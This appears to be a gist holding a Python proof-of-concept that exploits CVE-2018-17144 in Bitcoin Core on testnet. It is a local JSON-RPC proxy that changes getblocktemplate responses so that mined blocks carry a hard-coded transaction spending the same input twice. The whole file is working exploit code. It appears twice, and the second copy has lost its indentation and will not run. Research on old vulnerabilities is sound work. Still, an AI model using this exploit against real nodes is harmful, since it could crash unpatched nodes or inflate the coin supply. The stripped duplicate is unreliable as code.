gdassori/CVE-2018-17144.py

## CVE-2018-17144.py
# Exploiting CVE 2018-17144 on Bitcoin Testnet
# Guido Dassori, twitter.com/khs9ne
# https://bitcoindev.network/looking-back-on-exploiting-cve-2018-17144/

import typing
import json
from http.server import BaseHTTPRequestHandler, HTTPServer
import requests


class JSONClient:
    def __init__(self, host, port):
        self.url = "http://{}:{}".format(host, port)

    def call(self, method: str, params: typing.List=None, headers=None):
        payload = {
            "method": method,
            "params": params,
            "jsonrpc": "2.0",
            "id": 1,
        }
        return requests.post(self.url, data=json.dumps(payload), headers=headers).json()


client = JSONClient('neuromante', '18332')


class JSONRPCServer(BaseHTTPRequestHandler):
    def do_POST(self):
        request = json.loads(self.rfile.read(int(self.headers['Content-Length'])).decode())
        result = {
            "id": request.get("id"),
            "result": None,
            "error": None
        }
        headers = {'content-type': 'application/json', 'Authorization': self.headers['Authorization']}
        print('Received Request %s' % request)
        response = client.call(request['method'], request['params'], headers=headers)
        print(request['method'])
        print(type(request['method']))
        if request['method'] == 'getblocktemplate':
            response['result']['transactions'] = [
                {
                    "txid": "fb7a8658ec015133e36e2cf7ddf7e8c887c3a5becec2f30f24ebfe43e72f4b59",
                    "data": "0100000002d9bf9d812cfc91e3ff3b7f68e85269f64e7825de0fa61ff9dde117c73b72086a010000008b4830"
                            "45022100e412610b2e2b8370f2eda0cf29fe19c2a4ea35191d8b42656e81bc97026b229e022046ff1df7293f"
                            "8dbc3efd95b125ebf679a4a68e8de2265990ef7553f1060dc9e301410455fd1c1a6cbfb25b5bba1cf6f850de"
                            "00d79852be3de51e50c0da683613303c533d079e147dfe07ce4d40df2b776b35184698d14fa107a61e0976b0"
                            "d9416880c8ffffffffd9bf9d812cfc91e3ff3b7f68e85269f64e7825de0fa61ff9dde117c73b72086a010000"
                            "008a47304402206fa6ef6c0727ecf8d40b2b4648a93b084396c9819d20a3300e83ac4d110589e8022060c78d"
                            "44db1d5b5babd1629c55d8058643d11a14da933b4bc5f7a8a2a7da377301410455fd1c1a6cbfb25b5bba1cf6"
                            "f850de00d79852be3de51e50c0da683613303c533d079e147dfe07ce4d40df2b776b35184698d14fa107a61e"
                            "0976b0d9416880c8ffffffff01e00f9700000000001976a914c8b876680fef08df5278a9df92df7e30b83cbb"
                            "7188ac00000000",
                    "hash": "fb7a8658ec015133e36e2cf7ddf7e8c887c3a5becec2f30f24ebfe43e72f4b59",
                    "depends": [],
                    "fee": 0.001 * 10 ** 8,
                    "sigops": 8,
                    "weight": 904
                }
            ]
        result.update(response)
        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.end_headers()
        self.wfile.write(json.dumps(response).encode())


if __name__ == '__main__':
    HTTPServer(('localhost', 18161), JSONRPCServer).serve_forever()
	# Exploiting CVE 2018-17144 on Bitcoin Testnet
	# Guido Dassori, twitter.com/khs9ne
	# https://bitcoindev.network/looking-back-on-exploiting-cve-2018-17144/

	import typing
	import json
	from http.server import BaseHTTPRequestHandler, HTTPServer
	import requests


	class JSONClient:
	def __init__(self, host, port):
	self.url = "http://{}:{}".format(host, port)

	def call(self, method: str, params: typing.List=None, headers=None):
	payload = {
	"method": method,
	"params": params,
	"jsonrpc": "2.0",
	"id": 1,
	}
	return requests.post(self.url, data=json.dumps(payload), headers=headers).json()


	client = JSONClient('neuromante', '18332')


	class JSONRPCServer(BaseHTTPRequestHandler):
	def do_POST(self):
	request = json.loads(self.rfile.read(int(self.headers['Content-Length'])).decode())
	result = {
	"id": request.get("id"),
	"result": None,
	"error": None
	}
	headers = {'content-type': 'application/json', 'Authorization': self.headers['Authorization']}
	print('Received Request %s' % request)
	response = client.call(request['method'], request['params'], headers=headers)
	print(request['method'])
	print(type(request['method']))
	if request['method'] == 'getblocktemplate':
	response['result']['transactions'] = [
	{
	"txid": "fb7a8658ec015133e36e2cf7ddf7e8c887c3a5becec2f30f24ebfe43e72f4b59",
	"data": "0100000002d9bf9d812cfc91e3ff3b7f68e85269f64e7825de0fa61ff9dde117c73b72086a010000008b4830"
	"45022100e412610b2e2b8370f2eda0cf29fe19c2a4ea35191d8b42656e81bc97026b229e022046ff1df7293f"
	"8dbc3efd95b125ebf679a4a68e8de2265990ef7553f1060dc9e301410455fd1c1a6cbfb25b5bba1cf6f850de"
	"00d79852be3de51e50c0da683613303c533d079e147dfe07ce4d40df2b776b35184698d14fa107a61e0976b0"
	"d9416880c8ffffffffd9bf9d812cfc91e3ff3b7f68e85269f64e7825de0fa61ff9dde117c73b72086a010000"
	"008a47304402206fa6ef6c0727ecf8d40b2b4648a93b084396c9819d20a3300e83ac4d110589e8022060c78d"
	"44db1d5b5babd1629c55d8058643d11a14da933b4bc5f7a8a2a7da377301410455fd1c1a6cbfb25b5bba1cf6"
	"f850de00d79852be3de51e50c0da683613303c533d079e147dfe07ce4d40df2b776b35184698d14fa107a61e"
	"0976b0d9416880c8ffffffff01e00f9700000000001976a914c8b876680fef08df5278a9df92df7e30b83cbb"
	"7188ac00000000",
	"hash": "fb7a8658ec015133e36e2cf7ddf7e8c887c3a5becec2f30f24ebfe43e72f4b59",
	"depends": [],
	"fee": 0.001 * 10 ** 8,
	"sigops": 8,
	"weight": 904
	}
	]
	result.update(response)
	self.send_response(200)
	self.send_header('Content-type', 'application/json')
	self.end_headers()
	self.wfile.write(json.dumps(response).encode())


	if __name__ == '__main__':
	HTTPServer(('localhost', 18161), JSONRPCServer).serve_forever()